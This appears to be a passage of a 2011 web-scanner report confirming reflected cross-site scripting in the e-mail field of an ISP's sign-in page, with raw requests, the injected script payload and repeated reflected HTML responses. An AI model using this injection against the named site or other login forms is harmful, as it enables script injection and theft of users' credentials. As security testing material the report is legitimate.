</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx?m_authType=3&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CE1)%3c%2fscript%3e&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000ce1)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000CE1)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSu..
Date: Mon, 21 Mar 2011 17:21:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17778
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx?m_authType=3&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CE1)%3c%2fscript%3e&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000ce1)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000CE1)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSu..
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| __EVENTTARGET | POST | 3 |
| __EVENTARGUMENT | POST | 3 |
| __VIEWSTATE | POST | /wEPDwUIOTgwMTMwMzhkZHWmTRgiVO MJYlgiy6PMKVGAQqc |
| __EVENTVALIDATION | POST | /wEWBgKp78XzAgL71YatCgKVg63aCAKyn FkAp7Vg EEArqY7psI8A qtvcn NThUQn3khS6hPha0NU= |
| m_emailAddress | POST | '"--></style></script><script>alert(0x000CE9)</script> |
| m_password | POST | 3 |
| m_submitButton | POST | SIGN IN |
| m_failedCount | POST | 3 |
| m_authType | POST | 3 |
Request
POST /authentication.aspx HTTP/1.1
Referer: http://www.signmein.co.za/authentication.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 375
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CE9)%3c%2fscript%3e&m_password=3&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Referer: http://www.signmein.co.za/authentication.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 375
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000CE9)%3c%2fscript%3e&m_password=3&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17574
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
